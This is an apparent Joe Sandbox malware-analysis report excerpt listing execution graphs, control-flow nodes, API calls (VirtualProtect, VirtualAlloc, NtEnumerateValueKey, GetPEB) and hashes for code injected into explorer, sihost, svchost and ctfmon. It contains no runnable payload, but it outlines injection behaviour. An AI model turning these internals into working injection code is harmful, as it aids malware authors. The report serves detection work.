                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction ID: de05bf30cab85946a627ca7ca8936c8e7440409c663a25d904fe20d67b3adcc0
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction Fuzzy Hash: D721F730B34C1E0BFB68A27C9859764F6D2E79C320F980295EA1DD36E4ED58CC8183C6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01380811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000003.00000002.2907441227.0000000001380000.00000040.00000400.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1380000_explorer.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: b142c140a4449e8d03ebce8a136155a13ceda980854198c96ff8cdc129ca3d2e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB3106720203056FEF057F749D46ABA3FACEF11318F040165BD85DA0A5EA3049A9CAB6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 013A0811 Relevance: 1.6, APIs: 1, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3424019298-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: c25900c69d3d233e20b6c0933702651d16b823d01824eaf3648888e0633aa3cb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: C03127720102057FEB057F749D4AABA3FACEF11318F840165BD95DA0A5EA344964CBBA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 013A08B3 Relevance: 1.5, APIs: 1, Instructions: 14threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3424019298-0
                                                                                                                                                                                          • Opcode ID: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
                                                                                                                                                                                          • Instruction ID: d157ced967fd7b67688515da118957b9b7ecc78bb560cdc002d4436a04f96d17
                                                                                                                                                                                          • Opcode Fuzzy Hash: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
                                                                                                                                                                                          • Instruction Fuzzy Hash: BEC04C2757090607CE18777C6C59458795CE92113EBC06735A567D4095E829451642AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:8.6%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:105
                                                                                                                                                                                          Total number of Limit Nodes:6
                                                                                                                                                                                          execution_graph 2599 ac08d9 2605 ac0cc4 2599->2605 2601 ac08e5 2608 ac0643 2601->2608 2603 ac08ef 2616 ac093e 2603->2616 2623 ac0c3f GetPEB 2605->2623 2607 ac0cc9 2607->2601 2609 ac0660 2608->2609 2625 ac067c 2609->2625 2611 ac0673 2631 ac06c2 2611->2631 2613 ac080f 2613->2603 2614 ac06b9 2614->2613 2635 ac0811 2614->2635 2617 ac0cc4 GetPEB 2616->2617 2619 ac094a 2617->2619 2618 ac0af1 2618->2603 2619->2618 2677 ac09d9 2619->2677 2622 ac09d2 2622->2618 2681 ac0af3 2622->2681 2624 ac0c4b 2623->2624 2624->2607 2624->2624 2626 ac0681 2625->2626 2627 ac06c2 4 API calls 2626->2627 2629 ac06b9 2627->2629 2628 ac080f 2628->2611 2629->2628 2630 ac0811 4 API calls 2629->2630 2630->2628 2633 ac06c7 2631->2633 2632 ac080f 2632->2614 2633->2632 2634 ac0811 4 API calls 2633->2634 2634->2632 2648 ac086e 2635->2648 2637 ac0840 2638 ac08c5 2637->2638 2639 ac0866 2637->2639 2641 ac08d9 2637->2641 2663 ac08d9 2638->2663 2639->2613 2653 ac1e62 2639->2653 2643 ac0cc4 GetPEB 2641->2643 2644 ac08e5 2643->2644 2645 ac0643 4 API calls 2644->2645 2646 ac08ef 2645->2646 2647 ac093e 4 API calls 2646->2647 2647->2646 2649 ac0873 2648->2649 2649->2637 2650 ac1e62 3 API calls 2649->2650 2651 ac08c7 2650->2651 2652 ac08d9 4 API calls 2651->2652 2652->2651 2654 ac1e73 2653->2654 2669 ac1d5a 2654->2669 2657 ac1d5a 3 API calls 2658 ac1eb9 2657->2658 2659 ac1d5a 3 API calls 2658->2659 2660 ac1ecc 2659->2660 2661 ac1d5a 3 API calls 2660->2661 2662 ac1edf 2661->2662 2662->2638 2664 ac0cc4 GetPEB 2663->2664 2665 ac08e5 2664->2665 2666 ac0643 4 API calls 2665->2666 2667 ac08ef 2666->2667 2668 ac093e 4 API calls 2667->2668 2668->2667 2670 ac1d6e 2669->2670 2671 ac1e60 2669->2671 2670->2671 2672 ac1d80 VirtualProtect 2670->2672 2671->2657 2672->2671 2673 ac1dac 2672->2673 2674 ac1daf VirtualAlloc 2673->2674 2674->2674 2675 ac1de1 2674->2675 2676 ac1e09 VirtualProtect 2675->2676 2676->2671 2680 ac09de 2677->2680 2678 ac0af3 4 API calls 2679 ac0af1 2678->2679 2679->2622 2680->2678 2680->2679 2683 ac0b01 2681->2683 2684 ac0cc4 GetPEB 2683->2684 2685 ac0b0d 2684->2685 2690 ac0b27 2685->2690 2687 ac0b20 2689 ac0b57 2687->2689 2694 ac0b65 2687->2694 2691 ac0b2c 2690->2691 2692 ac0b65 4 API calls 2691->2692 2693 ac0b57 2692->2693 2693->2687 2695 ac0b6a 2694->2695 2700 ac08b3 2695->2700 2702 ac08b9 2700->2702 2704 ac08c7 2700->2704 2701 ac08d9 4 API calls 2701->2704 2703 ac1e62 3 API calls 2702->2703 2703->2704 2704->2701 2719 ac0b6b 2721 ac0b7d 2719->2721 2720 ac08b3 4 API calls 2722 ac0bb1 2720->2722 2721->2720 2723 ac0c3f GetPEB 2722->2723 2724 ac0bb6 2723->2724 2705 ac21d1 2708 ac21f2 2705->2708 2706 ac2211 NtEnumerateValueKey 2707 ac226c 2706->2707 2706->2708 2708->2706 2708->2707 2709 ac1e62 2710 ac1e73 2709->2710 2711 ac1d5a 3 API calls 2710->2711 2712 ac1ea6 2711->2712 2713 ac1d5a 3 API calls 2712->2713 2714 ac1eb9 2713->2714 2715 ac1d5a 3 API calls 2714->2715 2716 ac1ecc 2715->2716 2717 ac1d5a 3 API calls 2716->2717 2718 ac1edf 2717->2718

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00AC21D1 Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 47 ac21d1-ac21f0 48 ac21f8-ac21fd 47->48 49 ac21f2-ac21f6 47->49 51 ac21ff-ac2203 48->51 52 ac2205-ac2208 48->52 50 ac220a-ac220e 49->50 53 ac2211-ac2244 NtEnumerateValueKey 50->53 51->50 52->53 54 ac226c-ac226f 53->54 55 ac2246-ac2249 53->55 55->54 56 ac224b-ac2256 call ac2196 55->56 59 ac225e-ac2261 56->59 60 ac2258-ac225c 56->60 59->54 61 ac2263-ac226a 59->61 60->59 61->53
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.2888928023.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnumerateValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1749906896-0
                                                                                                                                                                                          • Opcode ID: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
                                                                                                                                                                                          • Instruction ID: cdfd058294846393527a23a69d82aed125c299c38b3c44931be5a47ac5480816
                                                                                                                                                                                          • Opcode Fuzzy Hash: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
                                                                                                                                                                                          • Instruction Fuzzy Hash: F3213D31518E5D8F8F55EF1C8809FEA37E1FB68755B42032AAC19E3200D730D98087C1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00AC1D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.2888928023.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction ID: dd34eb1389eaef043c92a696ed53661b54a7e883a9eaaee22049f10a42ac24d8
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction Fuzzy Hash: E221F730B34C1D0BEB58A77C9859764F6D2E79C320F990299E91ED36E5ED58CC8183C6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00AC0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 11 ac0811-ac0846 call ac086e 14 ac08ad-ac08ae 11->14 15 ac0848-ac0851 11->15 16 ac08af-ac08b0 14->16 15->16 17 ac0853-ac085c 15->17 18 ac08b9-ac08cc call ac1756 call ac1e62 16->18 19 ac085e 17->19 20 ac08d0 17->20 23 ac08d4 call ac08d9 18->23 21 ac08c5-ac08cc 19->21 22 ac0860-ac0861 19->22 20->23 21->20 22->18 26 ac0863 22->26 28 ac08d9-ac0906 call ac0cc4 call ac14bc call ac0643 call ac0ce8 26->28 29 ac0866-ac086f 26->29 44 ac090b-ac090f 28->44 32 ac089e-ac08a4 29->32 33 ac0871-ac0897 29->33 32->14 33->32 45 ac0939 call ac093e 44->45
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.2888928023.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 23dfea852a366a571cc3348c698cc6744426d11f639f151413aad9b7f5eb2e10
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9231E472000204AFEF017F709E86FBA3BACEF11300F424169BD85DA0A2EA7449658BB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:5.1%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:69
                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                          execution_graph 2510 9108d9 2516 910cc4 2510->2516 2512 9108e5 2519 910643 2512->2519 2514 9108ef 2527 91093e 2514->2527 2534 910c3f GetPEB 2516->2534 2518 910cc9 2518->2512 2520 910660 2519->2520 2536 91067c 2520->2536 2522 910673 2542 9106c2 2522->2542 2524 91080f 2524->2514 2525 9106b9 2525->2524 2546 910811 2525->2546 2528 910cc4 GetPEB 2527->2528 2530 91094a 2528->2530 2529 910af1 2529->2514 2530->2529 2566 9109d9 2530->2566 2533 9109d2 2533->2529 2570 910af3 2533->2570 2535 910c4b 2534->2535 2535->2518 2535->2535 2537 910681 2536->2537 2538 9106c2 GetPEB 2537->2538 2540 9106b9 2538->2540 2539 91080f 2539->2522 2540->2539 2541 910811 GetPEB 2540->2541 2541->2539 2544 9106c7 2542->2544 2543 91080f 2543->2525 2544->2543 2545 910811 GetPEB 2544->2545 2545->2543 2557 91086e 2546->2557 2548 910840 2550 9108d9 2548->2550 2551 910866 2548->2551 2552 910cc4 GetPEB 2550->2552 2551->2524 2560 9108d9 2551->2560 2553 9108e5 2552->2553 2554 910643 GetPEB 2553->2554 2555 9108ef 2554->2555 2556 91093e GetPEB 2555->2556 2556->2555 2558 910873 2557->2558 2558->2548 2559 9108d9 GetPEB 2558->2559 2559->2558 2561 910cc4 GetPEB 2560->2561 2562 9108e5 2561->2562 2563 910643 GetPEB 2562->2563 2564 9108ef 2563->2564 2565 91093e GetPEB 2564->2565 2565->2564 2569 9109de 2566->2569 2567 910af3 GetPEB 2568 910af1 2567->2568 2568->2533 2569->2567 2569->2568 2572 910b01 2570->2572 2573 910cc4 GetPEB 2572->2573 2574 910b0d 2573->2574 2579 910b27 2574->2579 2576 910b20 2583 910b65 2576->2583 2580 910b2c 2579->2580 2581 910b65 GetPEB 2580->2581 2582 910b57 2580->2582 2581->2582 2582->2576 2584 910b6a 2583->2584 2589 9108b3 2584->2589 2590 9108b9 2589->2590 2591 9108d9 GetPEB 2590->2591 2591->2590 2592 910b6b 2593 910b7d 2592->2593 2594 9108b3 GetPEB 2593->2594 2595 910bb1 2594->2595 2596 910c3f GetPEB 2595->2596 2597 910bb6 2596->2597

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00910811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000005.00000002.2886729770.0000000000910000.00000040.00000001.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_910000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 0bb578ed6cec17c8f136f477abcb2608ff25218c2125ec3b643453ee16afebde
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE31D67220420C7FEB017B709D46BFA3B6CEF91300F4001A5BD85DA0A2DAB649D5CBB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:5.1%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:69
                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                          execution_graph 2592 9a0b6b 2594 9a0b7d 2592->2594 2593 9a08b3 GetPEB 2595 9a0bb1 2593->2595 2594->2593 2596 9a0c3f GetPEB 2595->2596 2597 9a0bb6 2596->2597 2510 9a08d9 2516 9a0cc4 2510->2516 2512 9a08e5 2519 9a0643 2512->2519 2514 9a08ef 2527 9a093e 2514->2527 2534 9a0c3f GetPEB 2516->2534 2518 9a0cc9 2518->2512 2520 9a0660 2519->2520 2536 9a067c 2520->2536 2522 9a0673 2542 9a06c2 2522->2542 2524 9a080f 2524->2514 2525 9a06b9 2525->2524 2546 9a0811 2525->2546 2528 9a0cc4 GetPEB 2527->2528 2529 9a094a 2528->2529 2530 9a0af1 2529->2530 2566 9a09d9 2529->2566 2530->2514 2532 9a09d2 2532->2530 2570 9a0af3 2532->2570 2535 9a0c4b 2534->2535 2535->2518 2535->2535 2537 9a0681 2536->2537 2538 9a06c2 GetPEB 2537->2538 2540 9a06b9 2538->2540 2539 9a080f 2539->2522 2540->2539 2541 9a0811 GetPEB 2540->2541 2541->2539 2544 9a06c7 2542->2544 2543 9a080f 2543->2525 2544->2543 2545 9a0811 GetPEB 2544->2545 2545->2543 2557 9a086e 2546->2557 2548 9a0840 2550 9a08d9 2548->2550 2551 9a0866 2548->2551 2552 9a0cc4 GetPEB 2550->2552 2551->2524 2560 9a08d9 2551->2560 2553 9a08e5 2552->2553 2554 9a0643 GetPEB 2553->2554 2555 9a08ef 2554->2555 2556 9a093e GetPEB 2555->2556 2556->2555 2558 9a0873 2557->2558 2558->2548 2559 9a08d9 GetPEB 2558->2559 2559->2558 2561 9a0cc4 GetPEB 2560->2561 2562 9a08e5 2561->2562 2563 9a0643 GetPEB 2562->2563 2564 9a08ef 2563->2564 2565 9a093e GetPEB 2564->2565 2565->2564 2569 9a09de 2566->2569 2567 9a0af3 GetPEB 2568 9a0af1 2567->2568 2568->2532 2569->2567 2569->2568 2572 9a0b01 2570->2572 2573 9a0cc4 GetPEB 2572->2573 2574 9a0b0d 2573->2574 2579 9a0b27 2574->2579 2576 9a0b20 2583 9a0b65 2576->2583 2580 9a0b2c 2579->2580 2581 9a0b65 GetPEB 2580->2581 2582 9a0b57 2580->2582 2581->2582 2582->2576 2584 9a0b6a 2583->2584 2589 9a08b3 2584->2589 2591 9a08b9 2589->2591 2590 9a08d9 GetPEB 2590->2591 2591->2590

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 009A0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.2887243645.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_9a0000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 87a61ee7780fe3dd6be775b2a921c89204c80ea1769b2b74f3f30dd65b7be30b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: DB31E6724102046FEB017B749D4ABBA7BACEF92310F000165BD85DA0A6EA7549648AFA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:8.3%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:101
                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                          execution_graph 2501 a51e62 2502 a51e73 2501->2502 2511 a51d5a 2502->2511 2505 a51d5a 3 API calls 2506 a51eb9 2505->2506 2507 a51d5a 3 API calls 2506->2507 2508 a51ecc 2507->2508 2509 a51d5a 3 API calls 2508->2509 2510 a51edf 2509->2510 2512 a51e60 2511->2512 2513 a51d6e 2511->2513 2512->2505 2513->2512 2514 a51d80 VirtualProtect 2513->2514 2514->2512 2515 a51dac 2514->2515 2516 a51daf VirtualAlloc 2515->2516 2516->2516 2517 a51de1 2516->2517 2518 a51e09 VirtualProtect 2517->2518 2518->2512 2519 a508d9 2525 a50cc4 2519->2525 2521 a508e5 2528 a50643 2521->2528 2523 a508ef 2536 a5093e 2523->2536 2543 a50c3f GetPEB 2525->2543 2527 a50cc9 2527->2521 2529 a50660 2528->2529 2545 a5067c 2529->2545 2531 a50673 2551 a506c2 2531->2551 2533 a5080f 2533->2523 2534 a506b9 2534->2533 2555 a50811 2534->2555 2537 a50cc4 GetPEB 2536->2537 2539 a5094a 2537->2539 2538 a50af1 2538->2523 2539->2538 2589 a509d9 2539->2589 2542 a509d2 2542->2538 2593 a50af3 2542->2593 2544 a50c4b 2543->2544 2544->2527 2544->2544 2546 a50681 2545->2546 2547 a506c2 4 API calls 2546->2547 2549 a506b9 2547->2549 2548 a5080f 2548->2531 2549->2548 2550 a50811 4 API calls 2549->2550 2550->2548 2553 a506c7 2551->2553 2552 a5080f 2552->2534 2553->2552 2554 a50811 4 API calls 2553->2554 2554->2552 2568 a5086e 2555->2568 2557 a50840 2558 a508c5 2557->2558 2559 a50866 2557->2559 2561 a508d9 2557->2561 2583 a508d9 2558->2583 2559->2533 2573 a51e62 2559->2573 2563 a50cc4 GetPEB 2561->2563 2564 a508e5 2563->2564 2565 a50643 4 API calls 2564->2565 2566 a508ef 2565->2566 2567 a5093e 4 API calls 2566->2567 2567->2566 2569 a50873 2568->2569 2569->2557 2570 a51e62 3 API calls 2569->2570 2571 a508c7 2570->2571 2572 a508d9 4 API calls 2571->2572 2572->2571 2574 a51e73 2573->2574 2575 a51d5a 3 API calls 2574->2575 2576 a51ea6 2575->2576 2577 a51d5a 3 API calls 2576->2577 2578 a51eb9 2577->2578 2579 a51d5a 3 API calls 2578->2579 2580 a51ecc 2579->2580 2581 a51d5a 3 API calls 2580->2581 2582 a51edf 2581->2582 2582->2558 2584 a50cc4 GetPEB 2583->2584 2585 a508e5 2584->2585 2586 a50643 4 API calls 2585->2586 2587 a508ef 2586->2587 2588 a5093e 4 API calls 2587->2588 2588->2587 2590 a509de 2589->2590 2591 a50af3 4 API calls 2590->2591 2592 a50af1 2590->2592 2591->2592 2592->2542 2595 a50b01 2593->2595 2596 a50cc4 GetPEB 2595->2596 2597 a50b0d 2596->2597 2602 a50b27 2597->2602 2599 a50b20 2601 a50b57 2599->2601 2606 a50b65 2599->2606 2603 a50b2c 2602->2603 2604 a50b65 4 API calls 2603->2604 2605 a50b57 2604->2605 2605->2599 2610 a50b6a 2606->2610 2612 a508b3 2610->2612 2613 a508c7 2612->2613 2614 a508b9 2612->2614 2615 a508d9 4 API calls 2613->2615 2616 a51e62 3 API calls 2614->2616 2615->2613 2616->2613 2617 a50b6b 2619 a50b7d 2617->2619 2618 a508b3 4 API calls 2620 a50bb1 2618->2620 2619->2618 2621 a50c3f GetPEB 2620->2621 2622 a50bb6 2621->2622

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00A51D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.2888442084.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction ID: e5dc80538da9fb4d46b28acacc3c2bb4e555f0cc24faa64339f8904ee302d7fe
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621D631A34C1D0BEB58A27C9859774F6E2F79C321F940295ED19D36D4ED68CC8183C6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00A50811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 11 a50811-a50846 call a5086e 14 a508ad-a508ae 11->14 15 a50848-a50851 11->15 16 a508af-a508b0 14->16 15->16 17 a50853-a5085c 15->17 18 a508b9-a508cc call a51756 call a51e62 16->18 19 a508d0 17->19 20 a5085e 17->20 23 a508d4 call a508d9 18->23 19->23 21 a508c5-a508cc 20->21 22 a50860-a50861 20->22 21->19 22->18 26 a50863 22->26 28 a50866-a5086f 26->28 29 a508d9-a50906 call a50cc4 call a514bc call a50643 call a50ce8 26->29 32 a50871-a50897 28->32 33 a5089e-a508a4 28->33 44 a5090b-a5090f 29->44 32->33 33->14 45 a50939 call a5093e 44->45
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.2888442084.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: d9c953606555283b5bd9303adf5bc3df3a133a87740289e9a75d62b9567f8b42
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: D831C672410204AFEF017F709E87EBA3BACFF11312F440165FD95DA0A6EA744969CAB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

